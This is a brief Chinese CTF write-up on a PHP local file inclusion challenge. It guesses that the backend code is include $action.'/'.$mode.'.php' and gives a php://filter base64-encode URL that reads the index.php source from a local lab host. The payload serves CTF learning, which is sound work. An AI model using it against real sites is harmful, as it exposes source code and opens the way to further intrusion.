CTF web题总结--LFI

xiaoxiao2021-02-27 193

本地文件包含漏洞（Local File Include），是php的include()函数存在设计缺陷，学习链接：php文件包含漏洞总结题目的url都是类似这种：

http://127.0.0.1/web500/index.php?action=front&mode=index http://127.0.0.1/web500/index.php?action=front&mode=newnote http://127.0.0.1/web500/index.php?action=front&mode=delete

猜想后台代码可能是这样：

include $action.'/'.$mode.'.php'

于是利用文件包含获取index.php源码：

http://127.0.0.1/web500/index.php?action=php://filter/read=convert.base64‐encode/resource=./&mode=index

转载请注明原文地址: https://www.6miu.com/read-12429.html

技术

最新回复(0)